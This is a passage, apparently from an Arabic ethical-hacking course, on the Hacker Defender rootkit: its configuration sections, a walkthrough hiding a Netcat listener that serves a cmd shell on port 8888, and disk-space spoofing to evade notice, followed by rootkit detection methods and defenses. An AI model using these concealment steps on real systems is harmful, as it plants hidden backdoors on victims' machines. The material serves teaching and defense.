اﻟﻘﺳم ] [Startup Runھﻲ ﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺳوف ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﺗﻠﻘﺎﺋﯾﺎ ﺑﻣﺟرد ﺑدأ .Hacker Defenderوھذا ﺳﯾﻛون ﻣﻛﺎﻧﺎ ﺟﯾدا ﻟﺳرد
اﻷﻣر Netcatﻟو ﻛﻧت ﻣﮭﺗﻣﺎ ﺑﺈﻧﺷﺎء ﻣﺟﻣوﻋﺔ .backdoorﻓﻘط ﺗﺄﻛد ﻣن وﺿﻌﮫ ﻓﻲ وﺿﻊ اﻟﻣﺳﺗﻣﻊ). (Listener mode
ﺗﻣﺎﻣﺎ ﻣﺛل ﺗﺛﺑﯾت اﻟﺑراﻣﺞ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز واﻟﺗﻲ ﺗﻘوم ﺗﻠﻘﺎﺋﯾﺎ ﺑﺈﻧﺷﺎء ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل واﻟﻘﯾم ،ﺗرﻛﯾب اﻟﺑراﻣﺞ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﯾﺗطﻠب
ﻣﺳﺎﺣﺔ ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب .ھﻧﺎ ﻣرة أﺧرى ،ﻣﺳؤول اﻟﻧﺎظم ﯾﻣﻛﻧﮫ أن ﯾﻼﺣظ إذا ﻗﻣت ﺑﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﯾﺗطﻠب اﻟﻛﺛﯾر ﻣن ﻣﺳﺎﺣﺔ اﻟﻘرص .إذا
ﻛﺎن اﻟﻣﺳﺗﺧدم ﯾﺑدأ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﮫ ﻓﻲ ﺻﺑﺎح أﺣد اﻷﯾﺎم وﯾﻛﺗﺷف أن أﻛﺛر ﻣن ﻧﺻف ﻣﺳﺎﺣﺔ اﻟﻘرص اﻟﺻﻠب ﻓﺟﺄة ﺗم اﺳﺗﺧداﻣﮭﺎ،
ﻓﺎن ھذا ﺳوف ﯾﺛﯾر ﺑﻌض اﻟﺷﺑﮭﺎت ﻟدﯾﮫ .ﯾﻣﻛﻧك اﺳﺗﺧدام اﻟﻣﻘطﻊ ] [Free Spaceﻟدﻓﻊ اﻟﻛﻣﺑﯾوﺗر إﻟﻰ " إﺿﺎﻓﺔ ﻣرة أﺧرى " ﻛﻣﯾﺔ اﻟﻣﺳﺎﺣﺔ
اﻟﺣرة اﻟﺗﻲ ﺗم اﺳﺗﺧدﻣﺗﮭﺎ .ﺑﺣﯾث إدﺧﺎل رﻗم ھﻧﺎ ﺳوف ﯾﻔرض ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺑﺎﻹﺑﻼغ ﻋن اﻟﻣﺳﺎﺣﺔ اﻟﺣرة اﻟﻣﺗوﻓرة اﻟﻔﻌﻠﯾﺔ ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ اﻟرﻗم
اﻟذي ﻗﻣت ﺑﺈدﺧﺎﻟﮫ ﻓﻲ ھذا اﻟﻘﺳم .ﺑﻌﺑﺎرة أﺧرى ،إذا ﻗﻣت ﺑﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﯾﺗطﻠب 1ﻏﯾﻐﺎﺑﺎﯾت ﻣن اﻟﻣﺳﺎﺣﺔ اﻟﺣرة ،ﻓﺈﻧك ﯾﺟب أن ﺗﺿﯾف
1073741824ﻓﻲ اﻟﻘﺳم ] .[Free Spaceوﺑذﻟك ﯾﻘﻠل ﻣن اﺣﺗﻣﺎل اﻻﻛﺗﺷﺎف .ﯾرﺟﻰ ﻣﻼﺣظﺔ أن ﯾﺗم ﺳرد ھذا اﻟرﻗم ﻓﻲ ﺻورة ﺑﺎﯾت .إذا
ﻛﻧت ﺑﺣﺎﺟﺔ إﻟﻰ ﻣﺳﺎﻋدة ﻓﻲ ﺗﺣوﯾل اﻟﻣﺳﺎﺣﺔ ﻣن ﺑﺎﯾت إﻟﻰ ﻛﯾﻠو ﺑﺎﯾت إﻟﻰ ﻏﯾﻐﺎ ﺑﺎﯾت ﻣﯾﻐﺎ ﺑﺎﯾت ،ﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻵﻻت اﻟﺣﺎﺳﺑﺔ اﻟﺟﯾدة
اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت .ﺑﺑﺳﺎطﺔ ﺟوﺟل " ﺣﺎﺳﺑﺔ ﻛﯾﻠو ﺑﺎﯾت إﻟﻰ ﻣﯾﻐﺎﺑﺎﯾت ".
إذا ﻛﻧت ﺗﻌرف اﻟﻣﻧﺎﻓذ اﻟﺗﻲ ﺗﺧطط ﻟﻔﺗﺣﮭﺎ ،ﯾﻣﻛﻧك إدراﺟﮭﺎ ﺿﻣن اﻟﻣﻘطﻊ ] .[Hidden Portsﺳﺗﻼﺣظ أن ھذا اﻟﻘﺳم ﯾﻧﻘﺳم أﯾﺿﺎ إﻟﻰ
اﻹدﺧﺎﻻت اﻟﺗﺎﻟﯾﺔ ،TCPO ،TCPI :و ":TCPI" .UDPھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺗم ﻓﯾﮫ ﺳرد اﻟﻣﻧﺎﻓذ اﻟواردة ) (Inbound Portsاﻟﺗﻲ ﺗرﯾد
إﺧﻔﺎﺋﮭﺎ ﻋن اﻟﻣﺳﺗﺧدم .إذا ﻛﺎن ﻟدﯾك ﻣﻧﺎﻓذ ﻣﺗﻌددة ﺗرﯾد وﺿﻌﮭﺎ ھﻧﺎ ،ﺑﺑﺳﺎطﺔ ﯾﻔﺻل ﺑﯾﻧﮭﻣﺎ ﻓﺎﺻﻠﺔ ":TCPO" .ھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺳرد ﻓﯾﮫ
ﻣﻧﺎﻓذ TCPاﻟﺻﺎدرة اﻟﺗﻲ ﺗرﯾد أن ﺗﻛون ﻣﺧﻔﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم ":UDP" .ﯾﺳﺗﺧدم ھذا اﻟﻘﺳم ﻟﺗﺣدﯾد ﻣﻧﺎﻓذ UDPاﻟذي ﺗرﯾد إﺧﻔﺎؤھﺎ.
اﻵن أﺻﺑﺢ ﻟدﯾك ﻓﻛرة ﻋن ﻛﯾﻔﯾﺔ ﺗﻛوﯾن إﻋدادات Hacker Defenderاﻷﺳﺎﺳﯾﺔ ،دﻋوﻧﺎ ﻧﻔﺣص اﻷداة ﻓﻲ اﻟﻌﻣل .ﻟﮭذا اﻟﻣﺛﺎل ،ﺳوف ﻧﻘوم
ﺑﺗﺛﺑﯾت Hacker Defenderﻓﻲ اﻟﻣﺟﻠد ﻋﻠﻰ ﻣﺣرك اﻷﻗراص اﻟﺟذري \ C:واﻟذي ﯾﺳﻣﻰ " ."rkﺳوف ﻧﺿﻊ أﯾﺿﺎ ﻧﺳﺧﺔ ﻣن Netcatﻓﻲ
ھذا اﻟﻣﺟﻠد .ﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻋﻠﻰ ﻣﻠف اﻻﻋداد.
ﺳﺗﻼﺣظ أﻧﮫ ﻟﯾس ھﻧﺎك ﺳوى ﺑﺿﻌﺔ أﺳطر إﺿﺎﻓﯾﺔ ﺗم إﺿﺎﻓﺗﮭﺎ إﻟﻰ ﻣﻠف اﻟﺗﻛوﯾن اﻻﻓﺗراﺿﻲ .ﻓﻲ ھذا اﻟﻣﺛﺎل ،ﻗﻣﻧﺎ ﺑﺈﺿﺎﻓﺔ اﻟﻣﺟﻠد " "rkإﻟﻰ
اﻟﻣﻘطﻊ ] ،[Hidden Tableواﻟﻣﻠف ﻗﺎﺑل ﻟﻠﺗﻧﻔﯾذ Netcatإﻟﻰ اﻟﻣﻘطﻊ ] ،[Hidden Processوأﺧﯾرا ،إﻋداد Netcatﻟﻠﺑدء ﺗﻠﻘﺎﺋﯾﺎ ﻓﻲ
وﺿﻊ اﻟﻣﻠﻘم وﺗوﻓﯾر طرﻓﯾﺔ cmdﻓﻲ اﻟﻣﻧﻔذ 8888ﻣن اﻟﮭدف .إذا أردت إﺿﺎﻓﺔ طﺑﻘﺔ إﺿﺎﻓﯾﺔ ﻟﺗﺄﻛﯾد اﻻﺧﺗﻔﺎء ،ﯾﻣﻛن ذﻟك ﻣن ﺧﻼل إﺿﺎﻓﺔ
8888إﻟﻰ اﻟﻣﻘطﻊ ].[Hidden Ports
اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﯾظﮭر اﺛﻧﯾن ﻣن اﻟﻠﻘطﺎت ﻗﺑل ﺑدء ﻋﻣل .hacker Defenderﻻﺣظ أن ﻛﻼ ﻣن اﻟﻣﺟﻠد " "rkواﻟﺑرﻧﺎﻣﺞ )Netcat (nc.exe
ﻣرﺋﻲ.
وﻣﻊ ذﻟك ،ﺑﻣﺟرد ﺗﺷﻐﯾل/ﺗﻧﻔﯾذ اﻟﻣﻠف ،hxdef100.exeﻓﺎن Rootkitsﯾﺻﺑﺢ ﻓﻲ اﻟﻘوة اﻟﻛﺎﻣﻠﺔ .ﯾوﺿﺢ اﻟﺷﻛل اﻟﺗﺎﻟﻲ أن ﻛل ﻣن اﻟﻣﺟﻠد
" "rkواﻟﺑرﻧﺎﻣﺞ " "nc.exeأﺻﺑﺣﺎ ﻏﯾر ﻣرﺋﯾﯾن ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدم.
ﻛﻣﺎ ﺗرون ،ﺣﺗﻰ اﻟﺟذور أﺑﺳط Rootkitsﻣﺛل Hacker Defenderﻗﺎدرة ﺗﻣﺎﻣﺎ ﻋﻠﻰ اﺧﻔﺎء اﻟﻣﻠﻔﺎت Rootkits .ھﻲ ﻣوﺿوع واﺳﻊ
وﻧﺣن ﯾﻣﻛن ﺑﺳﮭوﻟﺔ ﺗﺧﺻﯾص ﻛﺗﺎب ﻛﺎﻣل إﻟﻰ اﻟﺗﻔﺎﺻﯾل اﻟﻔﻧﯾﺔ وﺗرﻛﯾﺑﺗﮭﺎ واﻷﻋﻣﺎل اﻟداﺧﻠﯾﺔ .ﺗﻛﻧوﻟوﺟﯾﺎ ،Rootkitsﻣﺛل ﻛل اﻟﺑرﻣﺟﯾﺎت
اﻟﺧﺑﯾﺛﺔ ،ﺗواﺻل ﺗطوﯾر ﺑوﺗﯾرة ﻣذھﻠﺔ .ﻣن أﺟل إﺗﻘﺎن ،Rootkitsﻓﺳوف ﺗﺣﺗﺎج ﻟﻠﺑدا ﻓﻲ اﻟﻔﮭم اﻟﺳﻠﯾم ﻟﻧواة ﻧظﺎم اﻟﺗﺷﻐﯾل .ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن
ﺗﻐطﯾﺔ اﻷﺳﺎﺳﯾﺎت ،وﯾﺷﺟﻊ ﺑﺷدة ﻟك اﻟﻐوص ﻓﻲ malware rabbit holeوﻧرى ﻛﯾف ﺳﺗﺳﯾر اﻻﻣور اﻟﻌﻣﯾﻘﺔ.
Detecting Rootkits
ﺗﺻﻧف ﺗﻘﻧﯾﺎت اﻟﻛﺷف ﻋن اﻟروت ﻛت ﻛﺎﻻﺗﻰ،cross-view-based ،integrity ،heuristic ،signature ،
و.Runtime Execution Path Profiling
Signature-based Detection
طرﯾﻘﺔ اﻟﻛﺷف اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ Signatureﺗﻌﻣل وﻛﺄﻧﮭﺎ ﺑﺻﻣﺔ اﻟروت ﻛت .ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﻋن طرﯾﻖ ﻣﻘﺎرﻧﺔ ﺗﺳﻠﺳل ﺑﺎﯾت ﻣن ﻣﻠف ﻣﻘﺎرﻧﺔ
ﻣﻊ ﺗﺳﻠﺳل ﺑﺎﯾت ﻟﻣﻠف آﺧر ﯾﻧﺗﻣﻲ إﻟﻰ ﺑرﻧﺎﻣﺞ ﺧﺑﯾث) . (malware programﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻓﻲ اﻟﻐﺎﻟب ﻋﻠﻰ ﻣﻠﻔﺎت اﻟﻧظﺎم .اﻟروت
ﻛت ﺗﻛون داﺋﻣﺎ ﻏﯾر ﻣرﺋﯾﺔ وﯾﻣﻛن اﻟﻛﺷف ﺑﺳﮭوﻟﺔ ﻋﻧﮭﺎ ﻋن طرﯾﻖ ﻓﺣص ذاﻛرة .kernelﻓرص ﻧﺟﺎح اﻟﻛﺷف اﻟﻘﺎﺋم ﻋﻠﻰ Signature
ﻗﻠﯾﻠﮫ ﻧظرا ﻟﻣﯾل اﻟروت ﻛت ﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت ﻋن طرﯾﻖ ﻗطﻊ ﻣﺳﺎر اﻟﺗﻧﻔﯾذ ﻟﻠﺑراﻣﺞ اﻟﻛﺷف.
Heuristic Detection
Heuristic detectionﯾﻌﻣل ﻋن طرﯾﻖ ﺗﺣدﯾد اﻻﻧﺣراﻓﺎت ﻓﻲ أﻧﻣﺎط ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻌﺎدﯾﺔ أو اﻟﺳﻠوﻛﯾﺎت .ھذا اﻟﻧوع ﻣن اﻟﻛﺷف ﯾﻌرف
أﯾﺿﺎ ﺑﺎﺳم اﻟﻛﺷف ﻋن اﻟﺳﻠوﻛﯾﺎت) Heuristic detection . (behavioral detectionﻗﺎدر ﻋﻠﻰ ﺗﺣدﯾد اﻟروت ﻛت اﻟﺟدﯾدة ،اﻟﻣﺟﮭوﻟﺔ
ﺳﺎﺑﻘﺎ .ھذه اﻟﻘدرة ﺗﻛﻣن ﻓﻲ ﻛوﻧﮫ ﻗﺎدرا ﻋﻠﻰ اﻟﺗﻌرف ﻋﻠﻰ اﻻﻧﺣراﻓﺎت ﻓﻲ أﻧﻣﺎط ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻌﺎدﯾﺔ أو اﻟﺳﻠوﻛﯾﺎت .ﺗﻧﻔﯾذ path hooking
ھو أﺣد اﻷﺷﯾﺎء اﻟﺗﻲ ﺗﺳﺑب اﻧﺣراﻓﺎت ﻓﻲ اﻟﺳﻠوك واﻟﺗﻲ ﺗﺳﺑب اﻟﻛﺷف اﻟﻘﺎﺋم ﻋﻠﻰ heuristicﻟﺗﺣدﯾد اﻟروت ﻛت.
Integrity-based Detection
ﺗﺗﻣﺛل وظﯾﻔﺔ Integrity-based detectionﻋﻠﻰ اﻟﻣﻘﺎرﻧﺔ ﺑﯾن ﻣﻠﻔﺎت اﻟﻧظﺎم اﻟﺣﺎﻟﻲ وﺳﺟﻼت اﻟﺗﻣﮭﯾد) ، (boot recordأو ﺻوره ﻣن
اﻟذاﻛرة ﻣﻊ ﻗواﻋد أﺳﺎﺳﯾﮫ ) (base-lineوﻣوﺛوق ﻓﯾﮭﺎ وﻣﻌروﻓﮫ .اﻷدﻟﺔ ﻋﻠﻰ وﺟود أي ﻧﺷﺎط ﺿﺎر ﯾﻣﻛن أن ﯾﻼﺣظ ﻣن ﻗﺑل اﻻﺧﺗﻼف ﺑﯾن
ﻟﻘطﺎت اﻟﺣﺎﻟﯾﺔ واﻟﻘواﻋد اﻷﺳﺎﺳﯾﺔ.
Cross-view-based Detection
ﺗﺗﻣﺛل وظﯾﻔﺔ ﺗﻘﻧﯾﺔ Cross-view-based detectionﻋﻠﻰ اﻓﺗراض أن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻗد ﺗم ﺗﺧرﯾﺑﮫ ﻣن ﺧﻼل ﺑﻌض اﻟطرﯾﻖ .ھذا ﯾﻘوم
ﺑﺗﻌداد ﻣﻠﻔﺎت اﻟﻧظﺎم واﻟﻌﻣﻠﯾﺎت وﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻋن طرﯾﻖ اﺳﺗدﻋﺎء .APlsﺛم ﺗﺗم ﻣﻘﺎرﻧﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﻣﻊ ﻣﺟﻣوﻋﺔ اﻟﺑﯾﺎﻧﺎت
اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﺧﻼل اﺳﺗﺧدام ﺧوارزﻣﯾﺔ ﺗﻌﺑر ﻣن ﺧﻼل ﻧﻔس اﻟﺑﯾﺎﻧﺎت .ﺗﻌﺗﻣد ھذه اﻟﺗﻘﻧﯾﺔ ﻋﻠﻰ ﺣﻘﯾﻘﺔ أن Hooking APIأو
اﻟﺗﻼﻋب ﻓﻲ ﺑﻧﯾﺔ ﺑﯾﺎﻧﺎت اﻟﻛﯾرﻧل ﯾؤدى اﻟﻰ إﻓﺳﺎد اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم إرﺟﺎﻋﮭﺎ ﻣن ﻗﺑل ﻧظﺎم اﻟﺗﺷﻐﯾل ،APlsﻣﻊ آﻟﯾﺎت اﻟﻣﺳﺗوى اﻟﻣﻧﺧﻔض
ﺗﺳﺗﺧدم ﻹﻧﺗﺎج ﻧﻔس اﻟﻣﻌﻠوﻣﺎت ﻣﺟﺎﻧﺎ ﻣن DKOMأو .hook manipulation
Runtime Execution Path Profiling
ﺗﻘﻧﯾﺔ Runtime Execution Path Profilingﺗﻘﺎرن ﺑﯾن Runtime Execution Path Profilingﻟﺟﻣﯾﻊ ﻋﻣﻠﯾﺎت اﻟﻧظﺎم
واﻟﻣﻠﻔﺎت اﻟﻘﺎﺑﻠﺔ ﻟﻠﺗﻧﻔﯾذ .اﻟروت ﻛت ﯾﺿﯾف اﻷﻛواد اﻟﺟدﯾد ﺑﺎﻟﻘرب ﻣن ﻣﺳﺎر ﺗﻧﻔﯾذ روﺗﯾن ﻣﻌﯾن ،ﺑﻐﯾﺔ زﻋزﻋﺔ اﺳﺗﻘرارھﺎ .ﻋدد اﻟﺗﻌﻠﯾﻣﺎت
اﻟﻣﻧﻔذة ﻗﺑل وﺑﻌد اﻟروﺗﯾن ﻣﻌﯾن ﯾﺗم اﺻطﯾﺎدھﺎ ) (hookedوﺗﻛون ﻣﺧﺗﻠﻔﺔ إﻟﻰ ﺣد ﻛﺑﯾر.
ﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻌدﯾد ﻣن وظﯾﻔﺔ اﻟروت ﻛت ﺗﻛون ﻋﻠﻰ ﻣﺳﺗوى اﻟﻛﯾرﻧل وﻟﮭﺎ اﻟﻘدرة ﻋﻠﻰ ﺗﺟﻧب اﻟﻛﺷف ﻋن طرﯾﻖ ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ
اﻟﻔﯾروﺳﺎت ،ﻟذﻟك ﻓﺎن ﺗرﻛﯾب واﺳﺗﺧدام وﺣﻔظ اﻟﺑرﻧﺎﻣﺞ ﻣﺣدﺛﮫ اﻟﻰ ﻣﺎ ﯾﺻل إﻟﻰ ﺗﺎرﯾﺦ اﻟﯾوم أﻣر ﺑﺎﻟﻎ اﻷھﻣﯾﺔ .ﺑﻌض اﻟروت ﻛت ،وﺧﺻوﺻﺎ
اﻹﺻدارات اﻟﻘدﯾﻣﺔ واﻷﻗل ﺗﻌﻘﯾدا ﻣﻧﮭﺎ ،ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ وﺗﻧظﯾﻔﮭﺎ ﻣن ﻗﺑل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت اﻟﺣدﯾﺛﺔ.
ﻣن اﻟﻣﮭم أﯾﺿﺎ ﻣراﻗﺑﺔ ﺣرﻛﺔ اﻟﻣرور اﻟﻘﺎدﻣﺔ اﻟﻰ واﻟﺧروج ﻣن اﻟﺷﺑﻛﺔ .اﻟﻌدﯾد ﻣن اﻟﻣﺳؤوﻟﯾن ﯾﻛون ﻣﮭﺗﻣﯾن ﺑرﺻد وﻋرﻗﻠﺔ ﺣرﻛﺔ اﻟﻣرور
واﻟﺗﻲ ﺗﺻب ﻓﻲ اﻟﺷﺑﻛﺔ .اﻧﮭم ﯾﻘﺿون اﻷﯾﺎم وﺣﺗﻰ أﺳﺎﺑﯾﻊ ﻟﺗﺣدﯾد وﻣﻧﻊ ﺣرﻛﺔ اﻟﻣرور اﻟواردة .ﻓﻲ ﻧﻔس اﻟوﻗت ،ﻛﺛﯾر ﻣن ھؤﻻء اﻟﻣﺳﺋوﻟﯾن
ﯾﺗﺟﺎھﻠوا ﺗﻣﺎﻣﺎ ﻛل ﺣرﻛﺔ اﻟﻣرور اﻟﺻﺎدرة .رﺻد ﺣرﻛﺔ اﻟﻣرور اﻟﺻﺎدرة ﯾﻌﺗﺑر أﻣرا ﺣﯾوﯾﺎ ﻓﻲ اﻟﻛﺷف ﻋن اﻟروت ﻛت وﻏﯾرھﺎ ﻣن اﻟﺑراﻣﺞ
اﻟﺿﺎرة .ﯾﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ ﻟﻣﻌرﻓﺔ اﻟﻣزﯾد ﻋن ﺗﺻﻔﯾﺔ اﻟﺧروج.
ﺗﻛﺗﯾك أﺧر ﺟﯾد ﻟﻠﻛﺷف ﻋن اﻟروت ﻛت و backdoorھو اﻟﻔﺣص ﺑﺎﻧﺗظﺎم ﻟﻣﻧﺎﻓذ اﻟﻧظم اﻟﺧﺎﺻﺔ ﺑك .إذا وﺟدت ﺑﻌض ﻣن ﻣﻧﺎﻓذ اﻟﻧظﺎم اﻟﻐﯾر
ﻣﻌروﻓﮫ ﻣﻔﺗوﺣﺔ ،ﺗﺄﻛد ﻣن ﺗﻌﻘب أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺷﺧﺻﯾﺔ وﺗﺣدﯾد اﻟﺧدﻣﺔ اﻟﻣﺎرﻗﺔ .أﯾﺿﺎ ﻣن ﺑﻌض اﻟﺗﻘﻧﯾﺎت اﻟﻐﻧﯾﺔ ﻋن اﻟﺗﻌرﯾف ھﻲ ﺗﺣﻠﯾل
ﻣﻠف اﻟﺳﺟل واﻟﺗﻲ ﺗﻌﺗﺑر ﺟزءا ً ﻣﮭﻣﺎ ﻣن إدارة اﻟﻣﺧﺎطر .ﻗد ﯾﻣﻠك اﻟﻣﮭﺎﺟم أﯾﺿﺎ ﺑراﻣﺞ اﻟﻧﺻﯾﺔ ) (shell scriptأو أدوات واﻟﺗﻲ ﯾﻣﻛن أن
ﺗﺳﺎﻋده ﻋﻠﻰ ﺗﻐطﯾﺗﮫ أو ﺗﻐطﯾﺔ ﻣﺳﺎرات اﻟﮭﺟوم ،وﻟﻛن ﺑﺎﻟﺗﺄﻛﯾد ﺳوف ﯾﻛون ھﻧﺎك ﻋﻼﻣﺎت ﻣﻧﺑﮭﺔ أﺧرى ﯾﻣﻛن أن ﺗؤدي إﻟﻰ ﺗداﺑﯾر ﻣﺿﺎدة
اﺳﺗﺑﺎﻗﯾﺔ ،وﻟﯾﺳت ﻣﺟرد رد اﻟﻔﻌل.
اﻟﺗدﺑﯾر اﻟﻣﺿﺎد ھو رد اﻟﻔﻌل ﻟﻠﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ ﻟﻛﺎﻓﺔ اﻟﺑﯾﺎﻧﺎت اﻟﮭﺎﻣﺔ ﺑﺎﺳﺗﺛﻧﺎء ،binariesواﻟذھﺎب ﻹﺟراء ﺗﺛﺑﯾت ﻧظﯾف ﻣن ﻣﺻدر ﻣوﺛوق
ﺑﮫ .ﯾﻣﻛن ﻟﻠﻣرء اﻧﺷﺎء ﻣﻠﺧص ﻟﻔﺣص اﻷﻛواد واﻟﺗﻲ ﺗﻌﺗﺑر ﻛوﺳﯾﻠﺔ ﻟﻠدﻓﺎع ﺟﯾدة ﺿد أدوات ﻣﺛل اﻟروت ﻛت MD5sum.exe .ﯾﻣﻛﻧﮫ اﻧﺷﺎء
ﺑﺻﻣﺔ ﻟﻠﻣﻠﻔﺎت وذﻟك ﻟﻣﻼﺣظﮫ أي ﻣن اﻻﻧﺗﮭﺎﻛﺎت ﻋﻧد ﺣدوث أي ﻣن اﻟﺗﻐﯾﯾرات .ﻟﻠدﻓﺎع ﺿد اﻟروت ﻛت ،ﯾﻣﻛن اﺳﺗﺧدام ﺑراﻣﺞ ﻓﺣص ﺳﻼﻣﺔ
ﻣﻠﻔﺎت اﻟﻧظﺎم اﻟﮭﺎﻣﺔ .ﺣﯾث ﺗﺗوﻓر اﻟﻌدﯾد ﻣن اﻷدوات واﻟﺑراﻣﺞ واﻟﺑرﻣﺟﯾﺎت واﻟﺗﻘﻧﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ ﻟﻠﺗﺣﻘﻖ ﻣن اﻟروت ﻛت.
ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻷﺳﺎﻟﯾب اﻟﺗﻲ ﯾﺗم اﻋﺗﻣﺎدھﺎ ﻟﻠدﻓﺎع ﺿد اﻟروت ﻛت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
إﻋﺎدة ﺗﺛﺑﯾت ﻧظﺎم اﻟﺗﺷﻐﯾل/اﻟﺗطﺑﯾﻘﺎت ﻣن ﻣﺻدر ﻣوﺛوق ﺑﻌد اﻟﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ ﻟﻠﺑﯾﺎﻧﺎت اﻟﮭﺎﻣﺔ. -
ﺗﺣدﯾد اﻟﻣوظﻔﯾن ذوي اﻟﻣﺳؤوﻟﯾﺎت اﻟﻐﯾر ﻣﺣدودة. -
إﺟراءات اﻟﺗﺛﺑﯾت اﻵﻟﻲ ﻣوﺛﻘﺔ ﺗوﺛﯾﻘﺎ ً ﺟﯾدا ﺑﺣﺎﺟﺔ إﻟﻰ أن ﯾﺗم اﻟﺣﻔﺎظ ﻋﻠﯾﮭﺎ. -
ﺗﺛﺑﯾت ﺷﺑﻛﺔ اﻻﺗﺻﺎل واﻟﺿﯾﻔﯾن ﻣﺳﺗﻧدا إﻟﻰ ﺟدران اﻟﺣﻣﺎﯾﺔ. -
اﺳﺗﺧدام ﻧظﺎم ﻣﺻﺎدﻗﺔ ﻗوي. -
اﻟﻣﺗﺟر اﻟﺗواﻓر ﻻﺳﺗﻌﺎدة ﺛﻘﺔ وﺳﺎﺋل اﻹﻋﻼم -
زﯾﺎدة اﻷﻣﺎن وﺗﺻﻌﯾب ﻣﺣطﺔ اﻟﻌﻣل أو اﻟﻣﻠﻘم ﺿد اﻟﮭﺟوم. -
ﺗﺣدﯾث patchesﻟﻧظم اﻟﺗﺷﻐﯾل واﻟﺗطﺑﯾﻘﺎت. -
ﯾﺟب ﺗﺣدﯾث ﺑرﻣﺟﯾﺎت اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﻔﯾروﺳﺎت وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﺑﺎﻧﺗظﺎم. -
ﯾﺟب ﻋدم ﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻏﯾر اﻟﺿرورﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك وأﯾﺿﺎ ﺗﻌطﯾل اﻟﻣﯾزات واﻟﺧدﻣﺎت اﻟﺗﻲ ﻟﯾس ﻟﮭﺎ اﺳﺗﺧدام. -
ﯾﺟب اﻟﺗﺣﻘﻖ ﻣن ﺳﻼﻣﺔ ﻣﻠﻔﺎت اﻟﻧظﺎم ﺑﺷﻛل ﻣﻧﺗظم ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر اﻟﺑﺻﻣﺔ اﻟرﻗﻣﯾﺔ اﻟﻘوى. -
اﻟﺗﺄﻛد ﻣن أن ﺑرﻧﺎﻣﺞ اﻟﺣﻣﺎﯾﺔ ﻣن اﻟﻔﯾروﺳﺎت اﻟذي ﺗم اﺧﺗﯾﺎره ﺗﻣﺗﻠك ﺣﻣﺎﯾﺔ ﺿد اﻟروت ﻛت ﻗﺑل ﺗﺛﺑﯾﺗﮫ. -
ﯾﺟب ﺗﺟﻧب ﺗﺳﺟﯾل اﻟدﺧول ﺑﺣﺳﺎب ﻟﮫ اﻣﺗﯾﺎزات إدارﯾﺔ. -
ﯾﻧﺑﻐﻲ اﻟﺗﻣﺳك ﺑﻣﺑدأ اﻻﻣﺗﯾﺎزات اﻷﻗل. -
أدوات ﻣﺛل ،Vice ،Rootkit RevealerوF-Secure’s Backlightھﻲ ﺑﻌض اﻟﺧﯾﺎرات اﻟﻛﺑﯾرة اﻟﺣر ﻟﻠﻛﺷف ﻋن وﺟود اﻟﻣﻠﻔﺎت
واﻟروت ﻛت اﻟﺧﻔﯾﺔ .ﻟﻸﺳف ،ﺑﻣﺟرد ﺗﺛﺑﯾت اﻟروت ﻛت ،ﻓﺈﻧﮫ ﯾﻣﻛن أن ﯾﻛون ﻣن اﻟﺻﻌب ﺟدا إزاﻟﺗﮫ ،أو ﻋﻠﻰ اﻷﻗل إزاﻟﺔ ﺗﻣﺎﻣﺎ .ﻓﻲ ﺑﻌض
اﻷﺣﯾﺎن ،ﻹزاﻟﺔ اﻟروت ﻛت ﯾﺗطﻠب ﻣﻧك ﺗﺷﻐﯾل اﻟﺟﮭﺎز ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل أﺧر ﻣﻘﺎرن و mountﻗرص اﻟﺻﻠب اﻷﺻﻠﻲ .ﺑواﺳطﺔ
